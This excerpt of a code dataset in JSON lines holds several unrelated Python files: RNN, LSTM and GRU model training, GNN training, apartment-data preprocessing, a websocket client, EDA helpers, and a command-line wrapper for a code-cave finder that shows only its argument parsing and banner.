torch.from_numpy(y_train)\ny_test = torch.from_numpy(y_test)\nlast_20_x_test = torch.from_numpy(last_20_x_test)\nlast_20_y_test = torch.from_numpy(last_20_y_test)\n\n# y_tensor = torch.tensor(y_train, dtype=torch.long, device=device)\n\n\n\n# In[416]:\n\n\nX_train = X_train.view(-1, 1, L).type(torch.FloatTensor)\n\nX_test = X_test.view(-1, 1, L).type(torch.FloatTensor)\n\nlast_20_x_test = last_20_x_test.view(-1, 1, L).type(torch.FloatTensor)\n\n\n# In[417]:\n\n\nprint(X_train.shape, y_train.shape, X_test.shape, last_20_x_test.shape)\n\n\n# In[418]:\n\n\ntrain_dataset = Data.TensorDataset(X_train, y_train)\ntest_dataset = Data.TensorDataset(X_test, y_test)\n\ntrain_loader = Data.DataLoader(dataset = train_dataset, batch_size =128, shuffle = True, num_workers=4) \n\n\ntest_loader = Data.DataLoader(dataset = test_dataset, batch_size = 20, shuffle = False, num_workers=4,)\n\n\n# ### Run only L=20 START\n\n# In[419]:\n\n\nlast_20_test_dataset = Data.TensorDataset(last_20_x_test, last_20_y_test)\nlast_20_test_loader = Data.DataLoader(dataset = last_20_test_dataset, batch_size = 185, shuffle = False, num_workers=4,)\n\n\n# In[420]:\n\n\nlen(last_20_test_loader)\n\n\n# # building RNN, LSTM, GRU model\n\n# In[421]:\n\n\nclass RNN(nn.Module):\n def __init__(self):\n super(RNN, self).__init__()\n\n self.rnn = nn.RNN(\n input_size=L,\n hidden_size=256, # rnn hidden unit\n num_layers=1, ) # number of rnn layer\n # batch_first=True) # input & output will has batch size as 1s dimension. e.g. (batch, time_step, input_size)\n \n self.out = nn.Linear(256, 2) # (hidden node數量, output數量)\n\n def forward(self, x):\n # x: (batch_size, time_step, input_size)\n # h_state: (num_layers, batch_size, hidden_size)\n # r_out: (batch_size, time_step, hidden_size)\n r_out, h_state = self.rnn(x, None)\n outs = self.out(r_out.squeeze(0))\n return outs.squeeze(1)\n \nclass LSTM(nn.Module):\n def __init__(self):\n super(LSTM, self).__init__()\n \n self.lstm = nn.LSTM(input_size=L, hidden_size=256, num_layers=1)\n self.output = nn.Linear(in_features=256, out_features=2)\n \n def forward(self, x):\n r_out, (r_h, r_c) = self.lstm(x, None)\n out = self.output(r_out[:, -1, :])\n return out\n\nclass GRU(nn.Module):\n def __init__(self):\n super(GRU, self).__init__()\n \n self.gru = nn.GRU(input_size=L, hidden_size=256, num_layers=1)\n self.output = nn.Linear(in_features=256, out_features=2)\n \n def forward(self, x):\n r_out, h_state = self.gru(x, None)\n out = self.output(r_out[:, -1, :])\n return out\n\n\n# In[422]:\n\n\n# Assigning Hyper Parameters\n# TIME_STEP = 10 # rnn time step\n# INPUT_SIZE = 1 # rnn input size\n# LR = 0.02 # learning rate\n\nclass Model():\n def __init__(self, net, train_data , test_data , EPOCH=20, LR=0.0001):\n self.net = net\n self.optimizer = torch.optim.Adam(net.parameters(), lr = LR)\n self.criterion = nn.CrossEntropyLoss()\n self.train_loader = train_data\n self.test_loader = test_data\n self.Epoch = EPOCH\n self.LR_ = LR\n\n# self.net = self.net.to(device)\n# if device == 'cuda':\n# # self.net = torch.nn.DataParallel(self.net)\n# torch.backends.cudnn.benchmark = True\n\n def plot_acc(self):\n\n every_history_loss = []\n every_history_train_acc = []\n every_history_test_acc = []\n every_predict = []\n for epoch in range(self.Epoch):\n print('======Epoch=======:', epoch)\n train_loss, train_acc = self.train()\n test_loss, test_acc, predict = self.test()\n\n every_history_loss.append(train_loss)\n every_history_train_acc.append(train_acc)\n every_history_test_acc.append(test_acc)\n every_predict.append(predict)\n return every_history_loss, every_history_train_acc, every_history_test_acc, every_predict\n\n def train(self):\n self.net.train()\n training_loss = 0\n correct_ans = 0\n total = 0\n # put the data in the loader into batch_x, batch_y\n for step, (batch_X, batch_y) in enumerate(self.train_loader):\n batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n self.optimizer.zero_grad()\n pred_outputs = self.net(batch_X)\n# print(pred_outputs.shape,batch_y.shape )\n# batch_y = batch_y.view(-1, 1).type(torch.FloatTensor)\n# print(pred_outputs.shape,batch_y.shape )\n loss = self.criterion(pred_outputs, batch_y.long())\n# batch_y = batch_y.type_as(pred_outputs)\n# loss = self.criterion(pred_outputs.squeeze(), batch_y)\n #從loss計算反向傳播\n loss.backward()\n #更新所有權種和偏差\n self.optimizer.step()\n training_loss += loss.item()\n \n #從output中取最大的出來作為預測值\n# _, predicted = torch.max(pred_outputs, 1)\n _, predicted = pred_outputs.max(1)\n #batch_y.size(0)=這個 batch裡面有多少筆資料\n total += batch_y.size(0)\n #計算 predicted和 batch_y(actual)之間預測對的個數\n correct_ans += predicted.eq(batch_y).sum().item() \n \n print(' **Training**')\n print('Loss: %.3f ' % ( training_loss ))\n print('Acc: %.3f%% (%d/%d)' % (100.*(correct_ans/total), correct_ans, total ))\n return training_loss, (correct_ans/total)\n\n\n\n def test(self):\n #evaluate\n self.net.eval()\n testing_loss = 0\n correct_ans = 0\n total = 0\n with torch.no_grad(): \n # put the data in the loader into batch_x, batch_y\n predict = []\n for step, (batch_X, batch_y) in enumerate(self.test_loader):\n batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n# print(batch_y)\n #predict the outputs\n pred_outputs = self.net(batch_X)\n \n # interval = 20 draw map\n predict.append(pred_outputs)\n # interval = 20 draw map\n\n loss = self.criterion(pred_outputs, batch_y.long())\n \n testing_loss += loss.item()\n #從output中取最大的出來作為預測值\n\n\n _, predicted = pred_outputs.max(1)\n #batch_y.size(0)=這個 batch裡面有多少筆資料\n total += batch_y.size(0)\n #計算 predicted和 batch_y(actual)之間預測對的個數\n correct_ans += predicted.eq(batch_y).sum().item() \n\n print(' **Testing**')\n print('Loss: %.3f ' % ( testing_loss ))\n print('Acc: %.3f%% (%d/%d)' % (100.*(correct_ans/total), correct_ans, total ))\n return testing_loss, (correct_ans/total), predict\n\n\n# # run GRU model\n\n# In[432]:\n\n\ngru_module = Model(GRU(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n# draw the acc and loss\nhistory_loss, history_train_acc, history_test_acc, predict_GRU = gru_module.plot_acc()\n\n\n# In[ ]:\n\n\npredict_GRU[-1]\n\n\n# In[433]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# # run RNN model\n\n# In[434]:\n\n\nrnn_module = Model(RNN(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n\n\nhistory_loss, history_train_acc, history_test_acc, predict_RNN = rnn_module.plot_acc()\n\n\n# In[437]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# # run LSTM model\n\n# In[423]:\n\n\nlstm_module = Model(LSTM(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n\n\nhistory_loss, history_train_acc, history_test_acc, predict_LSTM = lstm_module.plot_acc()\n\n\n# In[424]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# In[425]:\n\n\nclass last_20_prediction():\n def __init__(self, net , test_data):\n self.net = net\n self.test_loader = test_data\n\n def test(self):\n #evaluate\n self.net.eval()\n with torch.no_grad(): \n # put the data in the loader into batch_x, batch_y\n predict = []\n for step, (batch_X, batch_y) in enumerate(self.test_loader):\n batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n pred_outputs = self.net(batch_X)\n \n # interval = 20 draw map\n predict.append(pred_outputs)\n\n return predict\n\n\n# In[426]:\n\n\n# first comment the train fuction\nlast_20_prediction_module = last_20_prediction(LSTM(), last_20_test_loader)\nlast_20_prediction_ans = last_20_prediction_module.test()\n\n\n# In[395]:\n\n\nlast_20_prediction_ans\n\n\n# # draw the world map\n\n# In[435]:\n\n\nimport pygal\nfrom pygal.style import DarkStyle\n\n\n# In[397]:\n\n\nlast_20_prediction_ans[0][0][0].item()\n\n\n# In[427]:\n\n\n# convert probs into outputs and get the country names\nascending = []\nascending_prob = []\ndescending = []\ndescending_prob =[]\nfor i, x in enumerate(last_20_prediction_ans[0]):\n if last_20_prediction_ans[0][i][0] >= last_20_prediction_ans[0][i][1]:\n ascending.append(df.iloc[i+1:i+2,0:1].values[0][0])\n ascending_prob.append(last_20_prediction_ans[0][i][0].item())\n else:\n descending.append(df.iloc[i+1:i+2,0:1].values[0][0])\n descending_prob.append(last_20_prediction_ans[0][i][1].item())\n\n\n# In[399]:\n\n\nprint(ascending[0])\n\n\n# In[400]:\n\n\nlen(ascending)\n\n\n# In[428]:\n\n\n# 返回il8n模塊中COUNTRIES字典中對應國家名的國別碼\nfrom pygal_maps_world.i18n import COUNTRIES\n\ndef get_country_code(last_20_country_name):\n country_code = []\n for i in range(len(last_20_country_name)):\n # 返回字典的所有鍵值對\n for code, name in COUNTRIES.items():\n if name == last_20_country_name[i]: # 根據國家名返回兩個字母的國別碼\n country_code.append(code)\n \n return country_code\n# return None # 如果沒有找到則返回None\n\n\n# In[429]:\n\n\n# get all the country code\ncountry_code_ascending = get_country_code(ascending)\ncountry_code_descending = get_country_code(descending)\n\n\n# In[430]:\n\n\nascending_dict = dict(zip(country_code_ascending, ascending_prob))\ndescending_dict = dict(zip(country_code_descending, descending_prob))\n\n\n# In[436]:\n\n\nworldmap_chart = pygal.maps.world.World(style=DarkStyle)\n\nworldmap_chart.title = 'Some countries'\nworldmap_chart.add('ascending', ascending_dict)\nworldmap_chart.add('descending',descending_dict)\nworldmap_chart.render_in_browser()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"charlottelin720/RNN-VAE","sub_path":"problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":14906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"567489175","text":"import collections, numpy as np\n\nclass BlancClass(object):\n \"\"\"blanc container class for having a collection of attributes\"\"\"\n\nclass BestSolution(object):\n \"\"\"container to keep track of the best solution seen\"\"\"\n def __init__(self, x=None, f=np.inf, evals=None):\n \"\"\"initialize the best solution with `x`, `f`, and `evals`.\n Better solutions have smaller `f`-values.\n\n \"\"\"\n self.x = x\n self.x_geno = None\n self.f = f if f is not None and f is not np.nan else np.inf\n self.evals = evals\n self.evalsall = evals\n self.last = BlancClass()\n self.last.x = x\n self.last.f = f\n\n def update(self, arx, xarchive=None, arf=None, evals=None):\n \"\"\"checks for better solutions in list `arx`, based on the smallest\n corresponding value in `arf`, alternatively, `update` may be called\n with a `BestSolution` instance like ``update(another_best_solution)``\n in which case the better solution becomes the current best.\n\n `xarchive` is used to retrieve the genotype of a solution.\n\n \"\"\"\n if arf is not None: # find failsave minimum\n minidx = np.nanargmin(arf)\n if minidx is np.nan:\n return\n minarf = arf[minidx]\n # minarf = reduce(lambda x, y: y if y and y is not np.nan and y < x else x, arf, np.inf)\n if type(arx) == BestSolution:\n if self.evalsall is None:\n self.evalsall = arx.evalsall\n elif arx.evalsall is not None:\n self.evalsall = max((self.evalsall, arx.evalsall))\n if arx.f is not None and arx.f < np.inf:\n self.update([arx.x], xarchive, [arx.f], arx.evals)\n return self\n elif minarf < np.inf and (minarf < self.f or self.f is None):\n self.x, self.f = arx[minidx], arf[minidx]\n self.x_geno = xarchive[self.x]['geno'] if xarchive is not None else None\n self.evals = None if not evals else evals - len(arf) + minidx+1\n self.evalsall = evals\n elif evals:\n self.evalsall = evals\n self.last.x = arx[minidx]\n self.last.f = minarf\n def get(self):\n \"\"\"return ``(x, f, evals)`` \"\"\"\n return self.x, self.f, self.evals, self.x_geno\n\n#____________________________________________________________\n#____________________________________________________________\n#\n\n#\n","repo_name":"Degiacomi-Lab/JabberDock","sub_path":"POW_v2/optimizers/BestSolution.py","file_name":"BestSolution.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"71587165921","text":"import argparse\nimport os\n\nimport torch as th\nimport torch.nn as nn\n\nfrom dgl import save_graphs\n\nfrom dgl.data import (\n BACommunityDataset,\n BAShapeDataset,\n TreeCycleDataset,\n TreeGridDataset,\n)\nfrom models import Model\n\n\ndef main(args):\n if args.dataset == \"BAShape\":\n dataset = BAShapeDataset(seed=0)\n elif args.dataset == \"BACommunity\":\n dataset = BACommunityDataset(seed=0)\n elif args.dataset == \"TreeCycle\":\n dataset = TreeCycleDataset(seed=0)\n elif args.dataset == \"TreeGrid\":\n dataset = TreeGridDataset(seed=0)\n\n graph = dataset[0]\n labels = graph.ndata[\"label\"]\n n_feats = graph.ndata[\"feat\"]\n num_classes = dataset.num_classes\n\n model = Model(n_feats.shape[-1], num_classes)\n loss_fn = nn.CrossEntropyLoss()\n optim = th.optim.Adam(model.parameters(), lr=0.001)\n\n for epoch in range(500):\n model.train()\n # For demo purpose, we train the model on all datapoints\n # In practice, you should train only on the training datapoints\n logits = model(graph, n_feats)\n loss = loss_fn(logits, labels)\n acc = th.sum(logits.argmax(dim=1) == labels).item() / len(labels)\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n print(f\"In Epoch: {epoch}; Acc: {acc}; Loss: {loss.item()}\")\n\n model_stat_dict = model.state_dict()\n model_path = os.path.join(\"./\", f\"model_{args.dataset}.pth\")\n th.save(model_stat_dict, model_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Dummy model training\")\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"BAShape\",\n choices=[\"BAShape\", \"BACommunity\", \"TreeCycle\", \"TreeGrid\"],\n )\n args = parser.parse_args()\n print(args)\n\n main(args)\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/gnn_explainer/train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"1490250700","text":"import argparse\nimport os\nimport time\nfrom code_splunker.splunk import splunk\n\nbanner = \"\"\"\n _____ _ _____ _ _\n/ __ \\ | | / ___| | | | |\n| / \\/ ___ __| | ___ \\ `--. _ __ | |_ _ _ __ | | _____ _ __\n| | / _ \\ / _` |/ _ \\ `--. \\ '_ \\| | | | | '_ \\| |/ / _ \\ '__|\n| \\__/\\ (_) | (_| | __/ /\\__/ / |_) | | |_| | | | | < __/ |\n \\____/\\___/ \\__,_|\\___| \\____/| .__/|_|\\__,_|_| |_|_|\\_\\___|_|\n | |\n |_| \"\"\"\ndef file_path(string):\n if os.path.isfile(string):\n return string\n else:\n raise NotADirectoryError(string)\n\ndef main():\n parser = argparse.ArgumentParser(description = 'Locate code caves within a program')\n parser.add_argument('-f','--file', required=True,help='File to look for codecaves')\n parser.add_argument('-s','--size',type=int , required = True, help='Minimum size of cave to look for')\n args = parser.parse_args()\n file_path(args.file)\n if args.size >= 0:\n pass\n else:\n raise ValueError(\"Minimum cave size was be greater or equal to 0!\")\n print(banner)\n print('[*] Starting the code splunking process...')\n print(\" \")\n time.sleep(2)\n # Start the code cave search process\n splunk(args.file,args.size)\n print('[*] Splunking complete')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ajstroze/code_splunker","sub_path":"code_splunker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24914426314","text":"import pandas as pd\nimport preprocessing as prc\n\ndf = prc.read_initial_dataframe()\n# drop useless features\ndf.drop(columns=['city', 'region', 'street', 'house'], inplace=True)\n# drop few apartments without target variable\ndf.dropna(subset=['price', 'nearest_subway', 'nearest_subway_time'], inplace=True)\ndf = prc.adjust_housing_type(df)\n\ndf = prc.adjust_nearest_subway_time(df)\ndf.drop(columns=['nearest_subway_time'], inplace=True)\n\ndf = prc.adjust_districts(df)\n\ndf_primary, df_secondary = prc.split_on_primary_secondary(df)\ndf_primary = prc.drop_columns_with_many_nans(df_primary, 0.35, ['house_type'])\n\ndf_primary = prc.adjust_areas(df_primary)\ndf_primary = prc.fillna_areas(df_primary)\n\ndf_primary = prc.adjust_completion_date(df_primary)\ndf_primary.completion_date.fillna(df_primary.completion_date.median(), inplace=True)\n\ndf_primary = prc.adjust_floor_number(df_primary)\n\ndf_primary = prc.adjust_house_type(df_primary)\ndf_primary.house_type.fillna('Панельный', inplace=True)\n\ndf_primary = prc.adjust_price(df_primary)\n\ndf_secondary = prc.drop_columns_with_many_nans(df_secondary, 0.4)\n\ndf_secondary.drop(columns=['bathroom_type', 'window_view', 'build_date',\n 'overlap_type', 'heating', 'elevators', 'emergency',\n 'apartment_renovation', 'entrances'], inplace=True)\n\ndf_secondary.house_build_date.fillna(int(df_secondary.house_build_date.mean()), inplace=True)\n\ndf_secondary = prc.adjust_house_type(df_secondary)\ndf_secondary.house_type.fillna('Панельный', inplace=True)\n\ndf_secondary = prc.adjust_areas(df_secondary)\ndf_secondary = prc.fillna_areas(df_secondary)\n\ndf_secondary = prc.adjust_floor_number(df_secondary)\n\ndf_secondary = prc.adjust_price(df_secondary)\n\napartments_df = pd.concat([df_primary.rename(columns={'completion_date': 'house_build_date'}), df_secondary])\napartments_df.house_build_date = apartments_df.house_build_date.astype(int)\napartments_df = apartments_df[['district', 'housing_type', 'house_type',\n 'house_build_date', 'floor_number', 'total_area',\n 'living_area', 'kitchen_area',\n 'nearest_subway', 'subway_type', 'subway_time', 'price']]\napartments_df.to_csv(\"../preprocessed_dataframes/apartments.csv\")\n\n\n# getting separate secondary apartments dataframe\n_, df_secondary2 = prc.split_on_primary_secondary(df)\ndf_secondary2 = prc.drop_columns_with_many_nans(df_secondary2, 0.5)\n# drop useless features\ndf_secondary2.drop(columns=['housing_type', 'overlap_type', 'emergency',\n 'bathroom_type', 'build_date', 'elevators'], inplace=True)\n\ndf_secondary2 = prc.adjust_areas(df_secondary2)\ndf_secondary2 = prc.fillna_areas(df_secondary2)\n\ndf_secondary2 = prc.adjust_floor_number(df_secondary2)\n\ndf_secondary2.apartment_renovation.fillna('Без ремонта', inplace=True)\n\ndf_secondary2.house_build_date.fillna(int(df_secondary2.house_build_date.mean()), inplace=True)\n\ndf_secondary2.house_type.fillna('Панельный', inplace=True)\n\ndf_secondary2 = prc.adjust_ceiling_high(df_secondary2)\ndf_secondary2.ceiling_high.fillna(df_secondary2.ceiling_high.median(), inplace=True)\n\ndf_secondary2.window_view.fillna(df_secondary2.window_view.value_counts().index[0], inplace=True)\n\ndf_secondary2.entrances.fillna(df_secondary2.entrances.median(), inplace=True)\n\ndf_secondary2.heating.fillna(df_secondary2.heating.value_counts().index[0], inplace=True)\n\ndf_secondary2 = prc.adjust_price(df_secondary2)\n\ndf_secondary2.house_build_date = df_secondary2.house_build_date.astype(int)\ndf_secondary2.entrances = df_secondary2.entrances.astype(int)\ndf_secondary2 = df_secondary2[['district', 'house_type', 'house_build_date', 'floor_number',\n 'entrances', 'heating', 'window_view', 'ceiling_high',\n 'apartment_renovation', 'total_area', 'living_area',\n 'kitchen_area', 'nearest_subway', 'subway_type', 'subway_time', 'price']]\ndf_secondary2.to_csv(\"../preprocessed_dataframes/secondary_apartments.csv\")\n","repo_name":"ESkripichnikov/real-estate-market-analysis","sub_path":"data_preprocessing/get_preprocessed_dataframes.py","file_name":"get_preprocessed_dataframes.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26279759963","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n stack = []\n path = path.split('/')\n \n for i in path:\n if i not in ['.', '..', '']:\n stack.append(i)\n else:\n if i == '..' and len(stack) != 0:\n stack.pop()\n return '/' + '/'.join(stack)\n","repo_name":"zhiqinlei/ProblemSolved","sub_path":"0071-Simplify-Path.py","file_name":"0071-Simplify-Path.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7633002761","text":"import asyncio\nimport signal\nimport logging\nimport datetime\nimport secrets\nimport random\nfrom tornado.websocket import websocket_connect\nfrom tornado.httpclient import HTTPRequest, HTTPClientError\n\n'''\nNotes:\n\nhttps://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketClientConnection\nhttps://www.tornadoweb.org/en/stable/httpclient.html#tornado.httpclient.HTTPRequest\n* Note request vs connect timeouts\n\n'''\n\nclass SpoolClient:\n\n def __init__(self, name, url):\n self.name = name\n self.url = url\n self.conn = None\n\n # Connection management\n self.locally_closed = False\n self.conn_retrigger = None\n\n\n #-- Callback Based System -----------------------------------------------------------------#\n\n async def connect(self):\n if self.conn is not None:\n raise Exception(\"Already connected\")\n\n remaining_connection_attempts = 5\n while True:\n try:\n print(\"Attempt a connection\")\n # Make our connection\n request = HTTPRequest(url=self.url,request_timeout=5)\n self.conn = await websocket_connect(\n url=request, on_message_callback=self.on_message )\n\n # Await to keep open: triggered by `on_close`\n self.locally_closed = False\n self.conn_retrigger = asyncio.Event()\n print(\"Connected\")\n await self.conn_retrigger.wait()\n\n # Reengage reconnection attemps\n print(\"Connection is lost\")\n remaining_connection_attempts = 5\n\n except HTTPClientError as err:\n print(\"err!\",err)\n self.conn = None\n except ConnectionRefusedError as err:\n print('refused!!!!',err)\n self.conn = None\n finally:\n print(\"Finally\")\n if self.locally_closed:\n return\n remaining_connection_attempts -= 1\n if remaining_connection_attempts > 0:\n print(\"waiting to try connecting again\")\n await asyncio.sleep(1)\n else:\n raise Exception(\"Could not connect\")\n print('done connect')\n\n '''\n def reconnect()...\n '''\n\n def close(self):\n if self.conn is not None:\n print(\"closing\")\n self.locally_closed = True\n self.conn.close()\n self.conn = None\n\n def on_closed(self):\n if self.locally_closed:\n print(\"on_closed: local close\")\n else:\n print(\"on_closed: Try to reconnect\")\n self.conn.close() # Needed?\n self.conn = None\n self.conn_retrigger.set()\n\n def on_message(self, message):\n if message is None:\n self.on_closed()\n else:\n print(\" ==>\",message)\n\n #-- Await System -----------------------------------------------------------------------------#\n\n async def connect2(self):\n # Should be called only once\n\n while True:\n try:\n print(\"Attempt a connection\")\n request = HTTPRequest(url=self.url,request_timeout=5)\n self.conn = await websocket_connect(url=request)\n print(\"connected\")\n while True:\n msg = await self.conn.read_message()\n if msg is None:\n break\n self.on_message2(msg)\n print(\"closed\")\n\n except HTTPClientError as err:\n print(\"err!\",err)\n self.conn = None\n except ConnectionRefusedError as err:\n print('refused!!!!',err)\n self.conn = None\n finally:\n self.conn = None\n print(\"finally\")\n\n print(\"Wait to try connecting again\")\n await asyncio.sleep(1)\n\n print(\"completed\")\n\n def on_message2(self, message):\n print(\" ==>\",message)\n\n\n #-- Write ------------------------------------------------------------------------------------#\n\n def write_something(self):\n if self.conn is None:\n return\n msg = f\"{self.name} {datetime.datetime.now()}\"\n print(\"<==\",msg)\n self.conn.write_message(msg)\n\n\nasync def main():\n # Set a custom name\n name = secrets.token_urlsafe(6)\n url = 'ws://localhost:8898/api/ws/channel/'\n\n # Make our client and await it connecting\n client = SpoolClient(name,url)\n\n # Ways of connecting\n conn_meth = 3\n if 1 == conn_meth:\n await client.connect()\n if 2 == conn_meth:\n asyncio.create_task(client.connect(),name=\"First conn\")\n if 3 == conn_meth:\n asyncio.create_task(client.connect2(),name=\"First conn\")\n\n # Define a periodic message\n # Note this can hang\n async def send_something():\n while True:\n client.write_something()\n sleep_for = 2+4*random.random()\n await asyncio.sleep(sleep_for)\n asyncio.create_task(send_something(),name=\"Send Something\")\n\n # Setup the shutdown systems\n shutdown_trigger = asyncio.Event()\n is_shutdown_triggered = False\n async def exit_handler(signame):\n nonlocal is_shutdown_triggered\n if is_shutdown_triggered:\n logging.info(\"already shutting down\")\n else:\n is_shutdown_triggered = True\n logging.info(\"shutdown start...\")\n try:\n client.close()\n except Exception as e:\n logging.error(f\"Error on shutdown: {e}\")\n logging.info(\"...shutdown complete\")\n shutdown_trigger.set()\n\n # Setup signal handlers\n loop = asyncio.get_event_loop()\n for signame in ('SIGINT', 'SIGTERM'):\n loop.add_signal_handler(\n getattr(signal, signame),\n lambda signame=signame: asyncio.create_task(exit_handler(signame))\n )\n\n # Block on the shutdown trigger\n await shutdown_trigger.wait()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"jeffreyleblanc/base-web-backend","sub_path":"client-server-medium/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14305921669","text":"\"\"\"\nuse this as im ported libary\nimport eda_methods as eda\n\"\"\"\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef meta(df, transpose=True):\n \"\"\"\n This function returns a dataframe that lists:\n - column names\n - nulls abs\n - nulls rel\n - dtype\n - duplicates\n - number of diffrent values (nunique)\n \"\"\"\n metadata = []\n dublicates = sum([])\n for elem in df.columns:\n\n # Counting null values and percantage\n null = df[elem].isnull().sum()\n rel_null = round(null/df.shape[0]*100, 2)\n\n # Defining the data type\n dtype = df[elem].dtype\n\n # Check dublicates\n duplicates = df[elem].duplicated().any()\n\n # Check number of nunique vales\n nuniques = df[elem].nunique()\n\n\n # Creating a Dict that contains all the metadata for the variable\n elem_dict = {\n 'varname': elem,\n 'nulls': null,\n 'percent': rel_null,\n 'dtype': dtype,\n 'dup': duplicates,\n 'nuniques': nuniques\n }\n metadata.append(elem_dict)\n\n meta = pd.DataFrame(metadata, columns=['varname', 'nulls', 'percent', 'dtype', 'dup', 'nuniques'])\n meta.set_index('varname', inplace=True)\n meta = meta.sort_values(by=['nulls'], ascending=False)\n if transpose:\n return meta.transpose()\n print(f\"Shape: {df.shape}\")\n\n return meta\n\ndef data_loss(df_clean, df_raw):\n \"\"\"\n This function returns the data loss in percent.\n \"\"\"\n return f\"{round((df_clean.shape[0]/df_raw.shape[0])*100,3)}% data loss\"\n\ndef describe_plus(df, transpose=True):\n \"\"\"\n This function returns a dataframe based on describ() function added:\n - skew()\n - kurtosis()\n - variance\n \"\"\"\n statistics = pd.DataFrame(df.describe())\n skew = pd.Series(df.skew())\n kurtosis = pd.Series(df.kurtosis())\n variance = pd.Series(df.var())\n\n statistics.loc['skew'] = skew\n statistics.loc['kurtosis'] = kurtosis\n statistics.loc['variance'] = variance\n\n if transpose:\n return round(statistics.transpose(), 2)\n return round(statistics, 2)\n\ndef correlogram(df):\n \"\"\"\n This function plots a correlogram.\n \"\"\"\n #Plot\n fig, ax = plt.subplots(figsize=(15, 10))\n mask = np.triu(df.corr())\n ax = sns.heatmap(round(df.corr()*100, 0),\n annot=True,\n mask=mask, cmap=\"coolwarm\")\n return df.corr().round(2)\n\ndef plot_train_test_split(y, y_train, y_test):\n \"\"\"\n This function plots the the sizes of training and test set.\n Also you will get a dataframe with the number of values and the relative distribution.\n \"\"\"\n # plot\n y.plot.hist()\n y_train.plot.hist()\n y_test.plot.hist()\n\n # dataframe with relative and absolut values\n plt.legend(['all', 'train', 'test'])\n storage = pd.DataFrame()\n storage['train abs'] = round(y_train.value_counts(), 2)\n storage['train %'] = round((y_train.value_counts()/y_train.shape[0]), 2)\n storage['test abs'] = round(y_test.value_counts(), 2)\n storage['test %'] = round((y_test.value_counts()/y_test.shape[0]), 2)\n storage['all abs'] = round(y.value_counts(), 2)\n storage['all %'] = round((y.value_counts()/y.shape[0]), 2)\n\n # prints informations about splits\n print (\"Training set has {} samples.\".format(y_train.shape[0]))\n print (\"Testing set has {} samples.\".format(y_test.shape[0]))\n return storage\n","repo_name":"jb-ds2020/nf-ds3-capstone-churn-prevention","sub_path":"eda_methods.py","file_name":"eda_methods.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"26979364397","text":"\"\"\" Unit tests for qt_event_handler.py \"\"\"\n\n# pylint: disable=R0201, C0103\n\nimport unittest\n\n# pylint: disable=ungrouped-imports\nfrom unittest.mock import (\n patch,\n Mock\n)\n# pylint: enable=ungrouped-imports\nfrom itasks import ItasksService\nfrom itasks_components import ItasksComponent\nfrom qt_event_handler import QtEventHandler\n\n\nclass TestQtEventHandler(unittest.TestCase):\n \"\"\" Unit test class \"\"\"\n\n @patch('itasks.itasks_service.ItasksService')\n def test_button_cl1icked_event(self, itasks_service):\n \"\"\"\n method: button_clicked_event\n state: button clicked\n expected_result: itasks_service.send_ui_event called with correct data\n \"\"\"\n # Assign\n qpushbutton = Mock()\n button = Mock()\n button.qwidget = qpushbutton\n button.action_id = \"Ok\"\n button.task_id = \"2-0\"\n\n # Act\n QtEventHandler.button_clicked_event(button)\n\n # Asserts\n itasks_service._ItasksService__instance.send_ui_event.\\\n assert_called_once_with(\n {\n \"instanceNo\": 2,\n \"taskNo\": 